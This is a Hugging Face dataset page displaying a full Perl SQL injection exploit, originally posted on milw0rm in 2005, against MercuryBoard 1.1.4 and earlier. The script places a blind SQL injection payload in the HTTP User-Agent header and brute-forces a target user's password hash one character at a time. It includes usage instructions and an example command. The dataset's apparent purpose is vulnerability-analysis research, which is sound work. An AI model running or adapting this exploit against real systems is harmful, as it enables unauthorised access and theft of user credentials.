Team Ai
Modelpublic

lilbool/vuln-code-analysis

sourceHugging Facemitupdated 2y agoView on Hugging Face
0likes
exploit_1058.txt163 linesDownload Raw Back to exploits
1#!/usr/bin/perl

2

3### MercuryBoard <=1.1.4, MySQL => 4.1 sql injection exploit by RST/GHC

4### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

5### * note: you need first register on forum for get id and login

6### after what logout from forum and run exploit

7### * note2: edit timestamp in sources if exploit not work ;)

8### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

9### (c)oded by 1dt.w0lf

10### RST/GHC - http://rst.void.ru , http://ghc.ru

11### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

12

13use IO::Socket;

14use Getopt::Std;

15

16getopts('h:f:b:i:l:p:');

17

18$server    = $opt_h;

19$path      = $opt_f;

20$member_id = $opt_b;

21$hacker_id = $opt_i;

22$hacker_l  = $opt_l;

23$prefix    = $opt_p || 'mb_' ;

24

25if(!$server||!$path||!$member_id||!$hacker_id||!$hacker_l) { &usage; }

26

27$server =~ s!(http:\/\/)!!;

28

29$request  = 'http://';

30$request .= $server;

31$request .= $path;

32

33$s_num = 1;

34$|++;

35$n = 0;

36&head;

37print "\r\n";

38print " [~]      SERVER  : $server\r\n";

39print " [~]  FORUM PATH  : $path\r\n";

40print " [~] ID FOR BRUTE : $member_id\r\n";

41print " [~]    HACKER ID : $hacker_id\r\n";

42print " [~] HACKER LOGIN : $hacker_l\r\n";

43print " [~] TABLE PREFIX : $prefix\r\n\r\n";

44print " [~] SEARCHING PASSWORD ... [|]";

45

46while(1)

47{

48if(&found(47,58)==0) { &found(96,103); } 

49$char = $i;

50if ($char=="0") 

51 { 

52 if(length($allchar) > 0){

53 print qq{\b\b DONE ] 

54 

55 -------------------------------------------------------------------

56 USER ID : $member_id

57    HASH : $allchar

58 -------------------------------------------------------------------

59 };

60 }

61 else

62 {

63 print "\b\b FAILED ]";

64 }

65 exit();  

66 }

67else 

68 {  

69 $allchar .= chr($char); 

70 }

71$s_num++;

72}

73

74sub found($$)

75 {

76 my $fmin = $_[0];

77 my $fmax = $_[1];

78 if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }

79 

80 $r = int($fmax - ($fmax-$fmin)/2);

81 $check = "/**/BETWEEN/**/$r/**/AND/**/$fmax";

82 if ( &check($check) ) { &found($r,$fmax); }

83 else { &found($fmin,$r); }

84 }

85 

86sub crack($$)

87 {

88 my $cmin = $_[0];

89 my $cmax = $_[1];

90 $i = $cmin;

91 while ($i<$cmax)

92  {

93  $crcheck = "=$i";

94  if ( &check($crcheck) ) { return $i; }

95  $i++;

96  }

97 $i = 0;

98 return $i;

99 }

100 

101sub check($)

102 {

103 $n++;

104 status();

105 $ccheck = $_[0]; 

106 

107 $user_agent2 = "666',''),($hacker_id, 'board', 0, (SELECT/**/if((ascii(substring((SELECT/**/user_password/**/FROM/**/${prefix}users/**/WHERE/**/user_id=$member_id),$s_num,1)))$ccheck,1119336207,0)), '666.666.666.666', '666', '666')/*";

108

109 $sock2 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");

110 printf $sock2 ("GET %s?a=active HTTP/1.0\nHost: %s\nUser-Agent: %s\nAccept: */*\nConnection: close\n\n",

111 $request,$server,$user_agent2);

112 

113 while(<$sock2>) 

114  {   

115  #print $_;

116  if (/w=$hacker_id"\>$hacker_l/) { return 1; }

117  } 

118

119 return 0;

120 }

121 

122sub status()

123{

124  $status = $n % 5;

125  if($status==0){ print "\b\b/]";  }

126  if($status==1){ print "\b\b-]";  }

127  if($status==2){ print "\b\b\\]"; }

128  if($status==3){ print "\b\b|]";  }

129}

130

131sub usage()

132 {

133 &head;

134 print q(

135 USAGE

136    r57mercury.pl [OPTIONS]

137  

138 OPTIONS

139  -h [host]     ~ host where mercury board installed

140  -f [/folder/] ~ folder where mercury board installed

141  -b [user_id]  ~ user id for bruteforce

142  -i [id]       ~ hacker id (hacker must be register on forum)

143  -l [login]    ~ hacker login on forum

144  -p [prefix]   ~ database tables prefix (optional)

145                  default is "mb"

146 E.G.

147  r57mercury.pl -h www.blah.com -f /mercuryboard/ -b 2 -i 3 -l lamer

148 -------------------------------------------------------------------

149 (c)oded by 1dt.w0lf

150 RST/GHC , http://rst.void.ru , http://ghc.ru

151 );

152 exit();

153 }

154sub head()

155 {

156 print q(

157 -------------------------------------------------------------------

158 MercuryBoard <=1.1.4, MySQL => 4.1 sql injection exploit by RST/GHC

159 -------------------------------------------------------------------

160 );

161 }

162

163# milw0rm.com [2005-06-21]